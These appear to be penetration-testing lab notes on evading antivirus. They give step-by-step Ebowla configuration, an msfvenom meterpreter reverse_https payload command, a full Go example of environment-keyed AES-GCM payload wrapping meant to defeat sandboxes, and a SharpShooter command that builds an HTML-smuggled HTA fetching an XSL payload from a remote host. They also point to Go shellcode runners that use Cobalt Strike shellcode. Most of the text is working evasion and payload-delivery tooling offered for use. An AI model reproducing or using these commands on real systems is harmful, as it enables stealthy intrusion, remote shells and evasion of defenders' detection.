MALWARE AV EVASION
Ebowla Malware - https://github.com/Genetic-Malware/Ebowla
Ebowla wraps a payload so that it is only decrypted and run on the intended target: the key is derived from values of the target environment (environment variables, paths, an IP range or a time window), so the bare payload never sits on disk and a sandbox or analyst box with different values cannot recover it.
In genetic.config:
Set "output_type" to GO, Python, or Powershell (the language of the generated wrapper).
Set "payload_type" to the kind of payload you are wrapping, e.g. EXE.
Leave "clean_output" as false to start with; set it to true once you know the payload is successful.
Set "time_range" when you are ready to start your engagement, so the payload only runs inside that window.
Create the payload (or whatever payload you want):
msfvenom -p windows/meterpreter/reverse_https -f exe LHOST=10.10.10.10 LPORT=8443 > shell.exe
Generate the wrapped source:
./ebowla.py shell.exe genetic.config
Build the final binary from the generated Go source:
./build_x86_go.sh output/go_symmetric_shell.exe.go shell.exe
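The environmental-keying idea that Ebowla implements, as an added Go example written for this page (this is not Ebowla's code: Ebowla's own key derivation, config handling and output formats differ). The marker names, the payload bytes and the expected values are constructed for the demo. The builder derives an AES-256-GCM key from the marker values it expects on the target and ships only the ciphertext; the stub re-derives the key from what it actually observes, so off target the GCM tag check fails and no plaintext is ever produced:

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"crypto/sha256"
	"errors"
	"fmt"
	"sort"
	"strings"
)

// EnvMarkers maps a marker name (env var, path, day, ...) to the value the
// builder expects to find on the target. Names are hypothetical.
type EnvMarkers map[string]string

// deriveKey hashes the sorted name/value pairs into a 256-bit AES key.
// A host that yields different values derives a different key.
func deriveKey(m EnvMarkers) []byte {
	names := make([]string, 0, len(m))
	for k := range m {
		names = append(names, k)
	}
	sort.Strings(names) // map order is random; the key must not be
	var b strings.Builder
	for _, k := range names {
		b.WriteString(k)
		b.WriteByte(0) // separator so "a"+"bc" != "ab"+"c"
		b.WriteString(m[k])
		b.WriteByte(0)
	}
	sum := sha256.Sum256([]byte(b.String()))
	return sum[:]
}

func newGCM(m EnvMarkers) (cipher.AEAD, error) {
	block, err := aes.NewCipher(deriveKey(m))
	if err != nil {
		return nil, err
	}
	return cipher.NewGCM(block)
}

// Wrap is the builder side: encrypt the raw payload under the key derived
// from the expected markers. The marker values themselves do not ship.
func Wrap(payload []byte, expected EnvMarkers) ([]byte, error) {
	gcm, err := newGCM(expected)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := rand.Read(nonce); err != nil {
		return nil, err
	}
	// nonce || ciphertext || tag
	return gcm.Seal(nonce, nonce, payload, nil), nil
}

// Unwrap is the stub side: rebuild the key from the observed environment and
// try to open the blob. A wrong environment fails closed on the GCM tag.
func Unwrap(blob []byte, observed EnvMarkers) ([]byte, error) {
	gcm, err := newGCM(observed)
	if err != nil {
		return nil, err
	}
	if len(blob) < gcm.NonceSize() {
		return nil, errors.New("blob too short")
	}
	nonce, ct := blob[:gcm.NonceSize()], blob[gcm.NonceSize():]
	pt, err := gcm.Open(nil, nonce, ct, nil)
	if err != nil {
		return nil, errors.New("environment mismatch: payload stays encrypted")
	}
	return pt, nil
}

func main() {
	payload := []byte("constructed payload bytes") // stands in for shell.exe
	target := EnvMarkers{"USERNAME": "jdoe", "COMPUTERNAME": "WS01"}
	blob, err := Wrap(payload, target)
	if err != nil {
		panic(err)
	}
	if pt, err := Unwrap(blob, target); err == nil {
		fmt.Printf("on target: %q\n", pt)
	}
	_, err = Unwrap(blob, EnvMarkers{"USERNAME": "analyst", "COMPUTERNAME": "WS01"})
	fmt.Println("on sandbox:", err)
}
```

A time window is handled the same way: the builder keys to a day (or hour) value and the stub tries each candidate in the window until one opens the blob, which is why the original notes say to set the window only when the engagement is about to start.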
Windows Defender
C:\AD\Tools <--- In the lab this directory is excluded from Windows Defender scanning, so tools dropped there are not flagged on disk. A path exclusion only covers on-access scanning of files in that path; script content is still inspected through AMSI when it runs. Check the configured exclusions with Get-MpPreference before relying on one.
ThunderShell (PowerShell-based C2) - https://github.com/Mr-Un1k0d3r/ThunderShell
SharpShooter - https://github.com/mdsecactivebreach/SharpShooter
Background on the SharpShooter / SquiblyTwo tricks: https://0x00sec.org/t/clientside-exploitation-tricks-of-the-trade-0x01-sharpshooter-squibblytwo/8178
python SharpShooter.py --stageless --dotnetver 2 --payload hta --output malware --rawscfile /root/Desktop/payload.bin --smuggle --template mcafee --com xslremote --awlurl http://192.168.0.16:8080/malware.xsl
This builds a stageless HTA for .NET 2 from the raw shellcode in payload.bin, wraps it in an HTML smuggling page using the mcafee template, and uses the remote XSL COM technique so the payload is fetched from the --awlurl location at run time.
Execute shellcode in golang
https://github.com/brimstone/go-shellcode
https://github.com/vyrus001/shellGo
Both take raw shellcode, copy it into memory the Go binary allocates, mark that memory executable and transfer control to it.
For https://github.com/vyrus001/shellGo:
Copy the main.go file from https://raw.githubusercontent.com/vyrus001/shellGo/master/main.go
Generate a raw payload from Cobalt Strike, e.g., Attacks -> Packages -> Windows Executable (S) with Output set to Raw, so you get the bare shellcode bytes rather than a PE.